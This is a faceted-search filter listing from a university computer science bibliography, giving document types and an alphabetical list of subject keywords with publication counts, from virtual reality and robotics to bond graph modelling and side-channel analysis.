Refine
H-BRS Bibliography
- yes (979) (remove)
Departments, institutes and facilities
- Fachbereich Informatik (979) (remove)
Document Type
- Conference Object (571)
- Article (221)
- Preprint (50)
- Report (41)
- Part of a Book (31)
- Doctoral Thesis (20)
- Conference Proceedings (14)
- Research Data (11)
- Book (monograph, edited volume) (9)
- Master's Thesis (6)
Year of publication
Language
- English (979) (remove)
Keywords
- Virtual Reality (13)
- Robotics (12)
- Machine Learning (10)
- virtual reality (10)
- 3D user interface (7)
- Quality diversity (7)
- Augmented Reality (6)
- Robotik (6)
- Usable Security (6)
- Benchmarking (5)
- Measurement (5)
- Navigation (5)
- Virtual reality (5)
- computer vision (5)
- haptics (5)
- robotics (5)
- ARRs (4)
- Big Data Analysis (4)
- CUDA (4)
- Computer Graphics (4)
- Computer Vision (4)
- Deep Learning (4)
- FDI (4)
- GDPR (4)
- Image Processing (4)
- Knowledge Graphs (4)
- LoRa (4)
- Natural Language Processing (4)
- Perception (4)
- Quality Diversity (4)
- Risk-based Authentication (4)
- SpMV (4)
- Taxonomy (4)
- Visualization (4)
- embedded systems (4)
- machine learning (4)
- security (4)
- 802.11 (3)
- Aerodynamics (3)
- Algorithms (3)
- Augmented reality (3)
- BPMS (3)
- Bayesian optimization (3)
- Bioinformatics (3)
- Bond graph modelling (3)
- Cooperative Awareness Message (3)
- FPGA (3)
- Force field (3)
- Human-Robot Interaction (3)
- Hyperspectral image (3)
- IP protection (3)
- Intelligent Transport System (3)
- LoRaWAN (3)
- MAP-Elites (3)
- Object recognition (3)
- OpenFlow (3)
- Performance (3)
- Privacy (3)
- Pseudonym Concept (3)
- Ray Tracing (3)
- Ray tracing (3)
- Risk-based Authentication (RBA) (3)
- Robot sensing systems (3)
- Robustness (3)
- Security (3)
- Software (3)
- Surrogate Modeling (3)
- Transformers (3)
- UAV (3)
- Vehicular Ad hoc Networks (3)
- Virtuelle Realität (3)
- WiLD (3)
- clustering (3)
- foveated rendering (3)
- guidance (3)
- incremental bond graphs (3)
- motion estimation (3)
- parallel breadth-first search (3)
- post-buckling (3)
- power electronic systems (3)
- serious games (3)
- simulation (3)
- vection (3)
- virtual environments (3)
- 3D user interfaces (2)
- 3D-Scanner (2)
- AML (2)
- ARIMA (2)
- Active Learning (2)
- Adaptive Case Management (2)
- Alternatives (2)
- Artificial Intelligence (2)
- Authentication (2)
- Authentication features (2)
- Autoencoder (2)
- Automatic Short Answer Grading (2)
- B2T (2)
- BCL2 (2)
- BFS (2)
- Bag of Features (2)
- Black-Box Optimization (2)
- Blocking (2)
- Bond graphs (2)
- Business-to-Thing (2)
- Cognition (2)
- Cognitive robot control (2)
- Compositional Pattern Producing Networks (2)
- Content Module (2)
- Control Systems and Automation (2)
- Cutting sticks problem (2)
- DPA (2)
- Digitisation (2)
- Distributed rendering (2)
- Domestic Robots (2)
- Drosophila (2)
- Dynamic Case Management (2)
- EEG (2)
- Educational institutions (2)
- Electrical Machines and Power Electronics (2)
- Embedded software (2)
- Empirical study (2)
- Evolutionary Computation (2)
- Evolutionary computation (2)
- Evolutionary optimization (2)
- Explainable robotics (2)
- Eye Tracking (2)
- FOS: Computer and information sciences (2)
- Fas (2)
- Fault analysis (2)
- Fault detection and isolation (2)
- Fuzzy logic (2)
- GPU (2)
- Garbage collection (2)
- Generative Models (2)
- Graphics Cards (2)
- Grasping (2)
- HSP90 (2)
- Head-mounted Display (2)
- Heart Rate Prediction (2)
- Higher education (2)
- Human computer interaction (2)
- Human factors (2)
- Human-Centered Design (2)
- Human-Centered Robotics (2)
- Human-Computer Interaction (2)
- Humans (2)
- Hybrid systems (2)
- Hyper-parameter Tuning (2)
- IEEE 802.11 (2)
- IEEE802.11 (2)
- Incremental bond graph (2)
- Indirect Encodings (2)
- Inductive Logic Programming (2)
- Intel Xeon Phi (2)
- Intelligent controls (2)
- Intelligent virtual agents (2)
- Interaction Patterns (2)
- Internet (2)
- Internet of Things (2)
- Java virtual machine (2)
- LOTUS Sensor Node (2)
- Large, high-resolution displays (2)
- Lattice Boltzmann Method (2)
- Learning and Adaptive Systems (2)
- Learning from experience (2)
- Long-Distance WiFi (2)
- Low-Power Wide Area Network (LP-WAN) (2)
- MESD (2)
- Machine learning (2)
- Modelica (2)
- NUMA (2)
- Naive physics (2)
- Neuroevolution (2)
- Nvidia graphic processors (2)
- Object Detection (2)
- Object detection (2)
- Optimization (2)
- Original Story (2)
- Parallelization (2)
- Parameter sensitivities of transfer functions (2)
- Password (2)
- Path Loss (2)
- Perceptual Upright (2)
- QoS (2)
- RE (2)
- RGB-D (2)
- Raman microscopy (2)
- Rapid Prototyping (2)
- Reasoning (2)
- Rendering (2)
- Renewable Energy Systems (2)
- SDN (2)
- SEMA (2)
- Scale Tuning (2)
- Serious Games (2)
- Set partition problem (2)
- Side Channel Analysis (2)
- Side-channel analysis (2)
- Simulation (2)
- Single Instruction Multiple Data (SIMD) (2)
- Skin detection (2)
- Smart Card (2)
- Sparse Matrix Vector Multiplication (2)
- Sparse Matrix Vector multiply (SpMV) (2)
- Support Vector Machine (2)
- Survey (2)
- Three-dimensional displays (2)
- TinyECC 2.0 (2)
- Unity (2)
- Urban (2)
- Usability (2)
- Usable Security and Privacy (2)
- User Interface Design (2)
- VR (2)
- Vehicle-to-Vehicle Communication (2)
- Watermarking (2)
- WiFi (2)
- Wireless Sensor Network (2)
- Wireless backhaul (2)
- YAWL (2)
- adaptive fault thresholds (2)
- aerodynamics (2)
- analysis (2)
- automated sensor-screening (2)
- biometrics (2)
- blockchain (2)
- bond graph modelling (2)
- classifier combination (2)
- confidence level (2)
- convolutional neural networks (2)
- data filtering (2)
- data locality (2)
- deep learning (2)
- diagnostic bond graphs (2)
- diversity (2)
- domestic robots (2)
- dynamic vector fields (2)
- edutainment (2)
- external faults (2)
- eye-tracking (2)
- fault detection (2)
- feature (2)
- feature extraction (2)
- flight zone (2)
- geofence (2)
- human factors (2)
- hypermedia (2)
- ideal switches (2)
- image fusion (2)
- industrial robots (2)
- interaction (2)
- interface design (2)
- intrinsics (2)
- leaning (2)
- machine vision (2)
- memory bandwidth (2)
- monitoring (2)
- multisensory cues (2)
- naive physics (2)
- navigation (2)
- neural network (2)
- nonlinear stability (2)
- object categorization (2)
- object detection (2)
- optic flow (2)
- optical sensor (2)
- pansharpening (2)
- path planning (2)
- peripheral vision (2)
- physical activity (2)
- redundant work (2)
- reinforcement learning (2)
- residual sinks (2)
- robot competitions (2)
- robot dynamics (2)
- robot execution failures (2)
- robot introspection (2)
- self-motion perception (2)
- semiconducting metal oxide gas sensor array (2)
- service robots (2)
- short-term load forecasting (2)
- spatial updating (2)
- speech understanding (2)
- structural equation modeling (2)
- surrogate modeling (2)
- text mining (2)
- traffic surveillance (2)
- transfer learning (2)
- usable privacy (2)
- user study (2)
- vibration (2)
- 16S rRNA gene sequencing (1)
- 2D Level Design (1)
- 3D Segmentation (1)
- 3D User Interface (1)
- 3D design (1)
- 3D gaming (1)
- 3D interfaces (1)
- 3D navigation (1)
- 3D nucleus (1)
- 3D real-time echocardiography (1)
- 3D registration (1)
- 3D shape (1)
- 450 MHz (1)
- ABT-737 (1)
- ACPYPE (1)
- AD (1)
- AES (1)
- AI based translation (1)
- AI usage in sports (1)
- ALPS (1)
- AMBER (1)
- AMD Family 15h (1)
- ANSYS (1)
- API Documentation (1)
- API Gebrauchstauglichkeit (1)
- API usability (1)
- AR (1)
- ARM Cortex M3 Processor (1)
- Absolute nodal coordinate formulation (1)
- Abstract Syntax Tree (1)
- Acceptance (1)
- Account (Datenverarbeitung) (1)
- Account Security (1)
- Accuracy (1)
- Active locomotion (1)
- Active vision interface (1)
- Actuators (1)
- Acute lymphoblastic leukemia (1)
- Adaptation of Software (1)
- Adaptive Behavior (1)
- Adaptive Control (1)
- Advanced Driver Assistance Systems (1)
- Affordances (1)
- Agent-Based Modeling (1)
- Agents (1)
- Air Pollution (1)
- Air Pollution Monitoring (1)
- Air pollution modeling (1)
- Alkane (1)
- All-Swap Algorithm (1)
- Analysis of Bond Graph Models (1)
- Antifuse memory (1)
- Apprenticeship Learning (1)
- Architectural Patterns (1)
- Artificial Intelligence (cs.AI) (1)
- Artificial Intelligence and Natural Language Processing (1)
- Assistenzsystem (1)
- Assistive robots (1)
- Attention (1)
- Auditory Cueing (1)
- Ausbreitung (1)
- Authentifikation (1)
- Authorship watermark (1)
- Autoimmune disease (1)
- Automated Modelling (1)
- Automated design (1)
- Automation (1)
- Autonomous Driving (1)
- Autonomous Systems (1)
- Autonomy (1)
- Autotuning (1)
- Available Bandwidth (1)
- B-cell leukemia (1)
- B-cell lymphoma (1)
- BERT (1)
- BH3-mimetic inhibitor (1)
- BLOB Detection (1)
- Background music (1)
- Bacteria, Anaerobic (1)
- Ball Tracking (1)
- Ball tracking (1)
- Ballastless track (1)
- Bandwidth Estimation (1)
- Basis set (1)
- Bayesian Deep Learning (1)
- Beacon Chain (1)
- Behaviour-Driven Development (1)
- Benchmark (1)
- Best practice algorithms (1)
- Bicycle Simulator (1)
- Bildverarbeitung (1)
- Blob Detection (1)
- Block cipher (1)
- Blockchain (1)
- Bond Graph Modelling (1)
- Bond Graph modelling and simulation (1)
- Bond Graph models for fault detection and isolation (1)
- Bond graph (1)
- Bondgraph (1)
- Bound Volume Hierarchy (1)
- Bounding Box (1)
- Bounding box explanations (1)
- Branch and cut (1)
- Business Case (1)
- Business software (1)
- Business system (1)
- CAS (1)
- CEHL (1)
- CIBERSORT (1)
- CMMN (1)
- CNN (1)
- CPA (1)
- CPU (1)
- CPUID instruction (1)
- CREBBP (1)
- CSR5BC (1)
- Cache line fingerprinting (1)
- Cache-independent (1)
- Calibration (1)
- Camera selection (1)
- Camera view analysis (1)
- Canonical form of state equations and standard interconnection form for robustness study (1)
- Capability framework (1)
- Capacity (1)
- Carbohydrate (1)
- Case-Based Reasoning (1)
- Cell Processor (1)
- Cell/B.E. (1)
- Center-of-Mass (1)
- Centrifugation (1)
- Centrifuge (1)
- Cervical cancer screening (1)
- Cervicovaginal microbiome (1)
- Chalcogenide glass sensor (1)
- Challenges (1)
- Change-Prozess (1)
- Channel assignment (1)
- Chemical imaging (1)
- Chip ID (1)
- Chloroquine (1)
- Circular saws (1)
- Classification explanations (1)
- Classifiers (1)
- Cleaning Task (1)
- Climate Risks (1)
- Cloud Computing (1)
- Cloud computing (1)
- Clustering (1)
- Clusters (1)
- Co-creative processes (1)
- Co-located Collaboration (1)
- Co-located work (1)
- Co-rotational formulation (1)
- Code Generation (1)
- Code similarity analysis (1)
- Cognitive informatics (1)
- Cognitive robotics (1)
- Collaborating industrial robots (1)
- Coloured pointclouds (1)
- Colposcopy (1)
- Column (1)
- Comparative Analysis (1)
- Comparative analysis (1)
- Complex Event Processing (1)
- Complexity (1)
- Compliant Manipulation (1)
- Compliant fingers (1)
- Component Models (1)
- Composition of Patterns (1)
- Computational Fluid Dynamics (1)
- Computational causality (1)
- Computational chemistry (1)
- Computational creativity (1)
- Computational fluid dynamics (1)
- Computational modeling (1)
- Computer Automated Design (1)
- Computer Science - Computer Vision and Pattern Recognition (1)
- Computer Science - Learning (1)
- Computer Vision System (1)
- Computer architecture (1)
- Computer graphics (1)
- Computer-supported Cooperative Work (1)
- Computergrafik (1)
- Computersicherheit (1)
- Computersimulation (1)
- Computing methodologies (1)
- Concurrent Kleene Algebra (1)
- Concurrent repeated failure prognosis (1)
- Conformation (1)
- Congenital heart disease (1)
- Connectivity in rural areas (1)
- Container Structure (1)
- Containerization (1)
- Content Analysis (1)
- Content Security Policies (1)
- Contextualized Attention Metadata (CAM) (1)
- Continual robot learning (1)
- Control (1)
- Convexity (1)
- Corporate Social Responsibility (1)
- Correlative Microscopy (1)
- Cortex-M3 (1)
- Counterfeit protection (1)
- Coupled process (1)
- Covert channel (1)
- Created Gravity (1)
- Critical power (1)
- Cross-core (1)
- Cross-sensitivity (1)
- Crossmedia (1)
- Cryptography (1)
- Crystal structure (1)
- Current research information systems (1)
- Customization (1)
- CyberGlove (1)
- Cybersickness (1)
- Cypher (1)
- DAE systems (1)
- DCF (1)
- DFA Lab (1)
- DNA extraction protocols (1)
- DNA profile (1)
- DOI (1)
- DPA Lab (1)
- Data Fusion (1)
- Data Generation (1)
- Data Protection Officer (1)
- Data Publication (1)
- DataCite (1)
- Database Management Systems (1)
- Databases and Data Mining (1)
- Dataflow Programming (1)
- Datalog (1)
- Declarative Process Modeling (1)
- Deklarative Prozessmodellierung (1)
- Delph Study (1)
- Demonstration-based training (1)
- Design Optimization (1)
- Design automation (1)
- Developer Centered Security (1)
- Diagnostic bond graph-based online fault diagnosis (1)
- Diagnostic bond graphs (1)
- Difference Visualization (1)
- Differential analysis (1)
- Digital Ecosystem (1)
- Digital Object Identifier (1)
- Digital Storytelling (1)
- Digital common goods (1)
- Digital watermarking (1)
- Dimensionality reduction (1)
- Directional Antenna (1)
- Directional antennas (1)
- Discrete cosine transform (1)
- Displacement (1)
- Distance Perception (1)
- Distributed Robot Systems (1)
- Divergent optimization (1)
- Docker (1)
- Domain Expert (1)
- Domain-Specific Language (1)
- Domain-Specific Languages (1)
- Domain-Specific Modeling Languages, (1)
- Domestic robotics (1)
- Domestic robots (1)
- Domestic service robots (1)
- Drahtloses lokales Netz (1)
- Drug (1)
- Drug resistance (1)
- Dynamic motion primitives (1)
- E-Health (1)
- ELM (1)
- ELMo (1)
- EM leakage (1)
- EN-12299 (1)
- ERP (1)
- ERP-software (1)
- ERP-system (1)
- ETV6-RUNX1 (1)
- Earth Observation (1)
- Eclipse Modeling Framework (1)
- Ecosystem simulation (1)
- Edutainment (1)
- Efficiency (1)
- Ego-Motion Estimation (1)
- Elderly People (1)
- Electric mobility (1)
- Electromagnetic Fields (1)
- Electronic tongue (1)
- Elephantiasis (1)
- Elliptic Curve Cryptography (1)
- Embedded system (1)
- Emotion (1)
- Empirical Study (1)
- Empirical formula (1)
- Employee Privacy (1)
- Employee data protection (1)
- EnOcean (1)
- Encryption (1)
- Enterprise software (1)
- Enterprise system (1)
- Entropy (1)
- Environment Perception (1)
- Environmental Data (1)
- Eriodictyol (1)
- Escape analysis (1)
- Estimation (1)
- Ethereum (1)
- Euler–Bernoulli beam (1)
- Evaluation (1)
- Evaluation als Kommunikationsanlass (1)
- Event detection (1)
- Everyday object manipulation (1)
- Evolutionary algorithms (1)
- Ewing´s Sarcoma Family of Tumors (1)
- Exchange and reuse of bond graph models (1)
- Executive functions (1)
- Exercise (1)
- Exergame (1)
- Experiment (1)
- Experiment design (1)
- Expert Interviews (1)
- Expert system (1)
- Explainability (1)
- Explainable Artificial Intelligence (XAI) (1)
- Explainable Machine Learning (1)
- External faults (1)
- FGR (1)
- FPGA implementation (1)
- FS20 (1)
- Face and hand gesture recognition (1)
- Facial Emotion Recognition (1)
- Factory instrumentation (1)
- Failure Prognosis (1)
- Fault Channel Watermarking Lab (1)
- Fault Detection & Diagnosis (1)
- Fault Diagnosis (1)
- Fault accommodation (1)
- Fault diagnosis (1)
- Fault handling (1)
- Fault simulation (1)
- Fault-channel watermarks (1)
- Feature Model (1)
- Feature extraction (1)
- Features (1)
- Feedback (1)
- Female (1)
- Field Study (1)
- Field programmable gate arrays (1)
- Field sequential imaging (1)
- Filtering (1)
- Fingerprint watermark (1)
- Finite element modelling (1)
- First-order frequency domain sensitivities (1)
- Five Factor Model (1)
- Fixed spatial data (1)
- Flexible multibody system (1)
- Flexible robots (1)
- Fluency (1)
- Focus plus context (1)
- Force (1)
- Force and tactile sensing (1)
- Foreground segmentation (1)
- Forests (1)
- Formal definition and validation of the content of a model description (1)
- Forms of mathematical models (1)
- Forschungsbericht (1)
- Foveated rendering (1)
- Free-Space Loss (FSL) (1)
- Frequency planning (1)
- Friction (1)
- Functional Programming (1)
- Functional safety (1)
- Fusion (1)
- Future (1)
- Future Studies (1)
- Future of Robotics (1)
- GDDL (1)
- GLI (1)
- GPGPU (1)
- GPT (1)
- GPT-2 (1)
- Gabor filter (1)
- Gabor filters (1)
- Game Engine (1)
- Games (1)
- Games and Simulations for Learning (1)
- Gaussian processes (1)
- Gaze Behavior (1)
- Gaze Depth Estimation (1)
- Gaze-contingent depth-of-field (1)
- Gender Issues in Computer Science Education (1)
- Generation R (1)
- Generative Design (1)
- Genetic Predisposition to Disease (1)
- Genetic algorithm (1)
- Genomics (1)
- Genomics/methods (1)
- Geo-tagging (1)
- Gesamt-Exom-Sequenzierung (1)
- Gesture Recognition (1)
- Gesture-based HRI (1)
- Givens Rotations (1)
- Global Illumination (1)
- Global illumination (1)
- Glycam06 (1)
- Gradient-based explanation methods (1)
- Gradient-boosting (1)
- Grailog (1)
- Graph Convolutional Neural Networks (1)
- Graph embeddings (1)
- Graph theory (1)
- Graphical user interfaces (1)
- Grasp Domain Definition Language (1)
- Grasp Planner (1)
- Gravitation (1)
- Gromacs (1)
- Grounded Method (1)
- Group Behavior (1)
- Group behavior (1)
- Group behavior analysis (1)
- Groupware (1)
- HCI (1)
- HCSS (1)
- HDAC inhibitor (1)
- HDBR (1)
- HIF1α (1)
- HPC (1)
- HPV diagnostic (1)
- HRI (1)
- HSP70 (1)
- HTTP (1)
- Hand Guidance (1)
- Hand Tracking (1)
- Hand injuries (1)
- Hardware (1)
- Head Mounted Display (1)
- Head-Mounted Displays (1)
- Header whitelisting (1)
- Healthcare logistics (1)
- Heat Shock Protein (1)
- Heat shrink tubing (1)
- High hyperdiploidy (1)
- High-performance computing (1)
- High-resolution displays (1)
- High-speed railway track (1)
- High-speed track (1)
- Highly Automated Driving (1)
- Histograms (1)
- HomeMatic (1)
- Hough Forests (1)
- Human Factors (1)
- Human centered computing (1)
- Human orientation perception (1)
- Human robot interaction (1)
- Human-robot interaction (1)
- Humanoid Robot (1)
- Hybrid Failure Prognosis (1)
- Hybrid Systems (1)
- Hybrid models (1)
- Hybrid models of engineering systems (1)
- Hydraulic orifices (1)
- Hydrocarbon (1)
- Hydroxychloroquine (1)
- HyperNEAT (1)
- IC identification (1)
- ICF (1)
- ICP (1)
- IEC 104 (1)
- IEC 61850 (1)
- IEEE 802.21 (1)
- ISO9999 (1)
- IT professionals (1)
- IaaS (1)
- Ikaros (1)
- Illumination algorithms (1)
- Image Classification (1)
- Image representation (1)
- Image-based rendering (1)
- Immersion (1)
- Immersive Virtual Environments (1)
- Immersive Visualization Environment (1)
- Immersive analytics (1)
- Implementation Challenges (1)
- Increasing fault magnitude (1)
- Incremental true bond graphs (1)
- Industrial robots (1)
- Industry 4.0 (1)
- Information Privacy (1)
- Information Security (1)
- Information Types (1)
- Information hiding (1)
- Information interaction (1)
- Informationsflüsse (1)
- Innovation (1)
- Input reconstruction (1)
- Instance-based learning (1)
- Instantaneous assignment (1)
- Instantiation (1)
- Instruction design (1)
- Instruction scheduling (1)
- Integer programming (1)
- Integral backstepping technique (1)
- Integrate Development Environment (1)
- Integrated circuit interconnections (1)
- Intel processors (1)
- Intelligent Autonomous Systems (1)
- Interaction (1)
- Interaction devices (1)
- Interactive Object Detection (1)
- Interactive Smart Card Applications (1)
- Interaktion (1)
- Interbank Market (1)
- Interference (1)
- Interferenz (1)
- Intermediaries (1)
- Intermittent faults (1)
- Interoperability (1)
- Inventory (1)
- Inverse simulation (1)
- IoT (1)
- Issue Tracking Systems (1)
- Issue Types (1)
- Issue tracking systems (1)
- JavaScript (1)
- KNN (1)
- KNX (1)
- Knowledge Management (1)
- Knowledge Worker (1)
- Knowledge representation (1)
- Knowledge-intensive Process (1)
- LAA (1)
- LBP (1)
- LDP (1)
- LGCSR (1)
- LSTM (1)
- LTE-M (1)
- LTE-U (1)
- Laminar and turbulent flow (1)
- Language Engineering (1)
- Language learning (1)
- Large display interaction (1)
- Large high-resolution displays (1)
- Large-Scale Online Services (1)
- Lattice Basis Reduction (1)
- Laws of programming (1)
- Lead userness (1)
- Leakage circuits (1)
- Learning analytics (1)
- Learning data mining (1)
- Learning from demonstration (1)
- Learning systems (1)
- Leg (1)
- Lennard-Jones parameters (1)
- Leukemia (1)
- Level-of-Detail (1)
- Library model (1)
- Ligands (1)
- Light curtain (1)
- Lighting simulation (1)
- Linear inverse models (1)
- Linear quadratic regulator (1)
- Linear regression (1)
- Liquidity Crises (1)
- LoRa receiver accuracy (1)
- Locomotion (1)
- Login (1)
- Long-Term Autonomy (1)
- Longley-Rice (1)
- Longley-Rice Irregular Terrain Model (ITM) (1)
- Lymphedema (1)
- Lymphoproliferative disorder (1)
- MAC (1)
- MACE (1)
- MBZ (1)
- METEOR score (1)
- MIMD (1)
- MOOC (1)
- MOX gas sensors (1)
- MP2.5 (1)
- MPLS (1)
- MQTT (1)
- Machine Learning (cs.LG) (1)
- Machine-learning (1)
- Main Memory (1)
- Maker space (1)
- Male (1)
- Malware (1)
- Management (1)
- Manipulation tasks (1)
- Manipulator (1)
- Markov Cluster Algorithm (1)
- Mathematical methods (1)
- Maximal covering location problem (1)
- Mebendazole (1)
- Media in education (1)
- Megatrends (1)
- Memory (1)
- Memory filesystem (1)
- Memory management (1)
- Memory-Constrained Devices (1)
- Mesh networks (1)
- Meteorological Data (1)
- Methodologies (1)
- Microarchitectural Data Sampling (MDS) (1)
- Microgravity (1)
- Middleware and Programming Environments (1)
- Mining Software Repositories (1)
- Mining software repositories (1)
- Mixed (1)
- Mixed method evaluation (1)
- Mobile devices (1)
- Mobile manipulation (1)
- Mobile robotics (1)
- Mobile robots (1)
- Mobiler Roboter (1)
- Modalities (1)
- Mode switching LTI model (1)
- Mode-dependent ARRs (1)
- Model Fitting (1)
- Model-Based Software Development (1)
- Model-Driven Engineering (1)
- Model-based Approach (1)
- Model-based Fault Diagnosis (1)
- Model-based failure prognosis (1)
- Model-based fault detection and isolation (1)
- Model-driven Development (1)
- Model-driven engineering (1)
- Model-free control (1)
- Modelling (1)
- Models of Variable Structure (1)
- Modular software packages (1)
- Molecular dynamics (1)
- Molecular modeling (1)
- Molecular rotation (1)
- Molecular structure (1)
- Morphological box (1)
- Morphological scheme (1)
- Motion (1)
- Motion Capture (1)
- Motion Sickness (1)
- Motion planning (1)
- Multi-Modal Interaction (1)
- Multi-Solution Optimization (1)
- Multi-Tenant Application (1)
- Multi-camera (1)
- Multi-component heavy metal solution (1)
- Multi-object visualization (1)
- Multi-objective (1)
- Multi-objective optimization (1)
- Multi-robot systems (1)
- Multi-stage (1)
- Multibody systems (1)
- Multicast communication (1)
- Multidisciplinary systems (1)
- Multidisciplinary Dynamic Systems (1)
- Multilayer interaction (1)
- Multimodal (1)
- Multimodal Microspectroscopy (1)
- Multimodal hyperspectral data (1)
- Multimodal optimization (1)
- Multiple Displays (1)
- Multisensory cues (1)
- Multithreaded and multicore architecture (1)
- Multiuser (1)
- Multivariate Time Series (1)
- Multivariate time series classification (1)
- Musical Performance (1)
- N200 (1)
- NEAT (1)
- NETCONF (1)
- NFKB (1)
- NGS (1)
- NIR (1)
- NIR-point sensor (1)
- NISTPQC (1)
- NLP (1)
- NNS (1)
- NURBS (1)
- NVIDIA Tesla (1)
- Narration Module (1)
- Natural language understanding (1)
- Natural scene text (1)
- Navigation interface (1)
- Network simulation verification (1)
- Networked Robots (1)
- Neural Machine Translation (1)
- Neuroscience (1)
- Noise (1)
- Noise reduction (1)
- Nonbonded scaling factor (1)
- Nonlinear control quadrotor uav (1)
- Numerical optimization (1)
- OCT (1)
- OCU (1)
- OER (1)
- Object Segmentation (1)
- Object detectors (1)
- Object-Based Image Analysis (OBIA) (1)
- Object-oriented physical systems modelling (1)
- Older adults (1)
- Online Services (1)
- Ontology (1)
- Open Access (1)
- Open innovation (1)
- Open source firmware (1)
- Open source software (1)
- Open-ended Robotic Discovery (1)
- Open-source (1)
- OpenACC (1)
- OpenDaylight (1)
- OpenMP (1)
- OpenMP, unrolling (1)
- OpenStack (1)
- Optical Flow (1)
- Optical flow (1)
- Optimisation 3D (1)
- Organic compounds and Functional groups (1)
- Out Of Distribution (OOD) data (1)
- Out-of-view Objects (1)
- Outer Space Research (1)
- Outlier Detection (1)
- Outside-in process (1)
- P300 (1)
- PAD (1)
- PAIS (1)
- PCR inhibitors (1)
- PDSTSP (1)
- PHR (1)
- PIR sensor units (1)
- PM2.5 estimation (1)
- PSD (1)
- PaaS (1)
- Pain Reduction (1)
- Parallel I/O (1)
- Parallel Processing (1)
- Parallel drone scheduling traveling salesman problem (1)
- Parameter degradation model (1)
- Parameter sensitivities of the residuals of analytical redundancy relations (1)
- Parameter uncertainties (1)
- Parametric study (1)
- Part Segmentation (1)
- Passwort (1)
- Path loss model (1)
- Pattern recognition (1)
- Pedigree (1)
- People Detection (1)
- Performance Simulation (1)
- Performance benchmarks (1)
- Performance prediction (1)
- Performance profiling (1)
- Periodic structures (1)
- Personal Health Record (1)
- Personality (1)
- Phenotypic niching (1)
- Physical activity (1)
- Physical exercising game platform (1)
- Plan-based robot control (1)
- Point Cloud Segmentation (1)
- Point Clouds (1)
- Pointing (1)
- Pointing Gesture Detection (1)
- Pointing Gesture Recognition (1)
- Pointing devices (1)
- Poisson Disc Distribution (1)
- Polymorphism, Single Nucleotide (1)
- Pose Estimation (1)
- Post-Quantum Signatures (1)
- Power Analysis (1)
- Precursor B-Cell Lymphoblastic Leukemia-Lymphoma/genetics (1)
- Prediction of physiological responses to strain (1)
- Predictive Models (1)
- Presence (1)
- Pressure wire (1)
- Pressure-volume relation (1)
- Privacy engineering (1)
- Privacy patterns (1)
- Probabilistic model (1)
- Process Automation (1)
- Process Models (1)
- Process views (1)
- Project based learning (1)
- Pronunciation (1)
- Proof of Stake (1)
- Proof-of-Stake (1)
- Proof-of-Work (1)
- Propagation (1)
- Protective system (1)
- Prototypes (1)
- Proximity (1)
- Prozessautomation (1)
- Prudential Regulation (1)
- Psychology (1)
- Public Key Infrastructure (1)
- Public Key Infrastructures (1)
- Q measurement (1)
- Qualitative reasoning (1)
- Quality control (1)
- Quality of Service (1)
- Qualitätspakt Lehre (1)
- Quantitative analysis of explanations (1)
- Quantum mechanical methods (1)
- Quantum mechanics (1)
- RAS (1)
- RBAR (1)
- RFID (1)
- RGB-D data (1)
- RLE-XOR (1)
- RLE-permutation (1)
- RMS acceleration (1)
- RNN (1)
- ROPOD (1)
- RSSI (1)
- Radiance caching (1)
- Radiofrequency identification (1)
- Radix Sort (1)
- Raman spectroscopy (1)
- Random number generator (1)
- Rapid prototyping (1)
- Raumwahrnehmung (1)
- Re-authentication (1)
- Reader (1)
- Real-Time Image Processing (1)
- Real-time image processing (1)
- Recommender systems (1)
- Reconstruction Error (1)
- Refinement (1)
- Reflectance modeling (1)
- Registration Refinement (1)
- Relapse (1)
- Relational Learning (1)
- Relative Energies (1)
- Remaining Useful Life (1)
- Remaining Useful Life (RUL) estimates (1)
- Render Cache (1)
- Repositories (1)
- Requirements (1)
- Requirements Communication (1)
- Requirements Engineering (1)
- Requirements analysis (1)
- Requirements engineering in SMEs (1)
- Restorative Virtual Environments (1)
- Reusable Software (1)
- Reversible Logic Synthesis (1)
- Review (1)
- Right to Informational Self-Determination (1)
- Risk-Based Account Recovery (1)
- RoboCup (1)
- RoboCup industrial (1)
- Robot Perception (1)
- Robot commands (1)
- Robot competitions (1)
- Robot failure diagnosis (1)
- Robot kinematics (1)
- Robot learning (1)
- Robot software (1)
- Robotic Governance (1)
- Robotic Natives (1)
- Robotic Revolutions (1)
- Robotic Technology (1)
- Robotic faults (1)
- Robotics (cs.RO) (1)
- Robotics competitions (1)
- Robots (1)
- Robust grasping (1)
- Rotating Table Test (1)
- Rule-based production systems (1)
- RuleML (1)
- Runtime Adaptation (1)
- Rural areas (1)
- S3D Video (1)
- S3D video (1)
- SAHA (1)
- SAML (1)
- SARS-CoV-2 (1)
- SDWN (1)
- SIMD (1)
- SIMPACK (1)
- SLIDE algorithm (1)
- SME (1)
- SMPA loop (1)
- SOA (1)
- SOAP (1)
- SORT (1)
- SQL (1)
- STAT3 (1)
- SVG (1)
- SVM (1)
- SaaS (1)
- Saccades (1)
- Saccadic suppression (1)
- Safety (1)
- Safety guard (1)
- Saliency maps (1)
- Sanity checks for explaining detectors (1)
- Scalability (1)
- Scalable Vector Graphic (1)
- ScalarMultiplication (1)
- Scene text recognition, active vision, domestic robot, pantilt, auto-zoom, auto-focus, adaptive aperture control (1)
- Scene understanding through Deep Learning (1)
- Scholarly workbench (1)
- School experiments (1)
- Scientific competency development (1)
- Scientific workbench (1)
- Second Life (1)
- Secure Coding Practices (1)
- Segmentation (1)
- Self-motion perception (1)
- Self-supervised learning (1)
- Semantic Segmentation (1)
- Semantic gap (1)
- Semantic models (1)
- Semantic scene understanding (1)
- Semantic search (1)
- Semantics (1)
- Sense of presence (1)
- Sensitivity matrix in symbolic form (1)
- SensorFusion (1)
- Separation algorithm (1)
- Service Robot (1)
- Service-Oriented Architecture (1)
- Service-based cloud computing (1)
- Shadow detection (1)
- Sicherheits-APIs (1)
- Side Channel Countermeasures (1)
- Side Channel Watermarking Lab (1)
- Side channel attack (1)
- Side channels (1)
- Side-channel watermarking (1)
- Signal (1)
- Signal detection (1)
- Signal processing (1)
- Signature Verification (1)
- Silmitasertib (1)
- Similarity matrix (1)
- Simulator (1)
- Single-objective (1)
- Skin (1)
- Slippage detection (1)
- Smart Card User Interface Design, Interactive Smart Card Applications (1)
- Smart Grid (1)
- Smart Home (1)
- Smart InGaAs camera-system (1)
- Smart factory (1)
- Smartphone (1)
- Smartphones (1)
- Social Virtual Reality (1)
- Social engagement in university (1)
- Social intelligence (1)
- Sociomateriality (1)
- Software Architecture (1)
- Software Architectures (1)
- Software Development Process (1)
- Software Feature Request Detection (1)
- Software Framework (1)
- Software IP protection (1)
- Software Supply Chain (1)
- Software and Architecture (1)
- Software reverse engineering (1)
- Softwareentwicklung (1)
- Somatogravic Illusion (1)
